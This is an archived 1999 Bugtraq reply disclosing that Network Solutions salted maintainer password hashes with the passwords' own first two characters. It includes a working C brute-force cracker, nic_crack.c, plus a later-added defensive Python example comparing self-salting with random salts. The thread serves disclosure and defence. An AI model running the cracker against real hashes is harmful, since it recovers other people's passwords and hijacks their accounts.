[12525] in bugtraq
Re: Insecure handling of NetSol maintainer passwords
daemon@ATHENA.MIT.EDU (pedward@WEBCOM.COM)
Thu Nov 11 12:29:57 1999
Content-Type: text
Message-Id: <199911102249.OAA03232@eris.webcom.com>
Date: Wed, 10 Nov 1999 14:49:58 -0800
Reply-To: pedward@WEBCOM.COM
From: pedward@WEBCOM.COM
X-To: jogata@nodc.noaa.gov
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <38287ADC.23E073B2@nodc.noaa.gov> from "Jefferson Ogata" at Nov 9, 99 02:49:48 pm
I couldn't resist doing a proof-of-concept, however I take no responsibility for cracking your own
password. It takes a while to run on fairly standard passwords. Please don't bombard me with
'haX0r d00d' requests, like the Frontpage thing.
--Perry
Compiles on RH6.0 with:
gcc -O -funroll-loops -o nic_crack nic_crack.c -lcrypt
---------------------------------------------------8<-------------------------------------------------
/* nic_crack.c - brute forces Netsol encrypted NIC update passwords */
#define _XOPEN_SOURCE
#include <stdio.h>
#include <stdlib.h>   /* exit() */
#include <string.h>   /* strncpy(), strcmp() */
#include <unistd.h>
#include <crypt.h>    /* crypt() prototype on glibc where unistd.h no longer declares it */
/* Candidate password laid out as one contiguous NUL-terminated string:
   a[] holds the two characters already known (the salt), b..g are enumerated. */
struct key {
char a[2];
char b, c, d, e, f, g;
char term;
};
int main(int argc, char *argv[])
{
char *passwd;
char *crypted;
struct key thekey;
char first[3];
int b,c,d,e,f,g,i;
if (argc<2) {
fprintf(stderr,"usage: nic_crack <crypted password>\n");
exit(1);
}
passwd = argv[1];
thekey.term = '\0';
/* salt = first two characters of the crypted value = first two password characters */
strncpy(first, argv[1], 2);
first[2] = 0;
strncpy(thekey.a, argv[1], 2);
for (g = 0; g < 127; g++) {
thekey.g = g;
for (f = 0; f < 127; f++) {
thekey.f = f;
for (e = 0; e < 127; e++) {
thekey.e = e;
for (d = 0; d < 127; d++) {
thekey.d = d;
for (c = 0; c < 127; c++) {
thekey.c = c;
for (b = 0; b < 127; b++) {
thekey.b = b;
crypted = (char *)crypt((char *)&thekey, first);
if (strcmp(crypted, passwd) == 0) {
printf("Found: %s\n", (char *)&thekey);
return 0;
}
}
}
}
}
}
}
return 0;
}
---------------------------------------------------8<-------------------------------------------------
> through crypt(), but the first two characters of the encrypted value (the salt)
> are the same as the first two characters of the password, indicating they use
> the password as its own salt. This dramatically limits the usefulness of
>
> --
> Jefferson Ogata <jogata@nodc.noaa.gov> National Oceanographic Data Center
> You can't step into the same river twice. -- Herakleitos
>
--
Perry Harrington Director of zelur xuniL ()
................ System Architecture Think Blue. /\
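As a defender-side illustration of the weakness Jefferson describes (the salt being the password's own first two characters), here is an added example that is not code from the original post: it models the self-salting scheme beside a properly random-salted one and adds an audit check that flags a record whose salt equals the known password's prefix. PBKDF2 from hashlib stands in for crypt(3) so it runs without the deprecated crypt module; the function names and the record format are my own.

```python
import hashlib
import secrets

ITERATIONS = 10_000  # PBKDF2 stands in for crypt(3); the salting logic is the point


def _digest(password: str, salt: str) -> str:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), ITERATIONS).hex()


def weak_hash(password: str) -> str:
    """Model of the scheme in the thread: the salt is the password's own first two chars."""
    salt = password[:2]
    return f"{salt}${_digest(password, salt)}"


def strong_hash(password: str) -> str:
    """Correct form: a salt drawn from a CSPRNG, unrelated to the password."""
    salt = secrets.token_hex(8)
    return f"{salt}${_digest(password, salt)}"


def verify(password: str, record: str) -> bool:
    salt, digest = record.split("$", 1)
    return secrets.compare_digest(_digest(password, salt), digest)


def salt_leaks_password(password: str, record: str) -> bool:
    """Audit check for an account whose password you legitimately know: True when the
    stored salt is exactly the password's first two characters, i.e. anyone who can
    read the hash store already has two plaintext characters for free."""
    salt = record.split("$", 1)[0]
    return verify(password, record) and salt == password[:2]


if __name__ == "__main__":
    pw = "hunter2xyz"  # constructed sample password
    for rec in (weak_hash(pw), strong_hash(pw)):
        print(rec[:12] + "...", "LEAKS PREFIX" if salt_leaks_password(pw, rec) else "ok")
```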